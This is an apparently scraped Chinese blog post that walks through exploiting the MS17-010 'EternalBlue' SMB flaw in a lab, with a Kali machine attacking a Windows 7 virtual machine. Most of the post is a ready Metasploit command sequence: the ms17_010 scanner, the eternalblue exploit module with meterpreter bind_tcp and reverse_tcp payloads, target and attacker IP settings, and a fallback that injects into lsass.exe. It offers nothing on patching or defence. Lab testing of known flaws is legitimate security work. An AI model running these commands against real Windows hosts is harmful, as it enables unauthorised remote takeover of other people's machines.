zoukankan      html  css  js  c++  java
  • MS17-010永恒之蓝验证

    一、安装MSF,windows下安装也可以,直接安装kali也可以,我是kali是攻击主机,win7是靶机,都在虚拟机里。

    1、windows下安装MSF请参考:http://blog.csdn.net/wangsy0202/article/details/51914748(https://www.metasploit.com/官网下载)

    2、kali的安装请直接去官网下载:https://www.kali.org/downloads/

    3、漏洞攻击文章请参考:https://bbs.ichunqiu.com/thread-23115-1-1.html

    准备时候还是要说一下注意事项:

    (1)请安装相关ruby插件:

    安装过程是:打开msfconsole 然后输入命令:

    1 gem install ruby_smb

    (2)一定要搞清楚win7主机防火墙和共享服务配置445需要open 

    (3)网络环境要搞清楚,是否有访问策略 是否有域认证等等,想明白了就像谁能发起连接。

    #攻击机可以主动发起连接,请使用正向payload windows/x64/meterpreter/bind_tcp

    #双向都可以主动发起连接的,请随意。(反向的windows/x64/meterpreter/reverse_tcp)

    #双向都不可以的,或者攻击机不可以的那就别玩了。

    (4)可以先扫描看看是否有漏洞

    1 use auxiliary/scanner/smb/smb_ms17_010
    2 set RHOSTS [targetip]
    3 run

    二、开始攻击:

    1 msf exploit(ms17_010_eternalblue) > use exploit/windows/smb/ms17_010_eternalblue 
    2 msf exploit(ms17_010_eternalblue) > set payload windows/x64/meterpreter/bind_tcp 
    3 msf exploit(ms17_010_eternalblue) > set RHOST 192.168.177.129
    4 msf exploit(ms17_010_eternalblue) > set LHOST 192.168.177.135
    5 msf exploit(ms17_010_eternalblue) > exploit

     

     搞定收工

    如果不行,麻烦加上这句:

    1 set PROCESSINJECT   lsass.exe
    2 set TARGETARCHITECTURE x64
  • 相关阅读:
    win10下vs2015配置Opencv3.1.0过程详解
    Int16, Int32, Int64 范围
    Microsoft Language and Locale Codes(微软语言和地区代码汇总)
    Azure china服务状态报告查看网址
    Azure IOT (EventHub + Stream Analytics + Table Storage)的使用
    java 继承extends 的相关知识点
    final
    java 垃圾回收机制
    Java 抽象类
    重载与重写、多态——java
  • 原文地址:https://www.cnblogs.com/KevinGeorge/p/8082570.html
Copyright © 2011-2022 走看看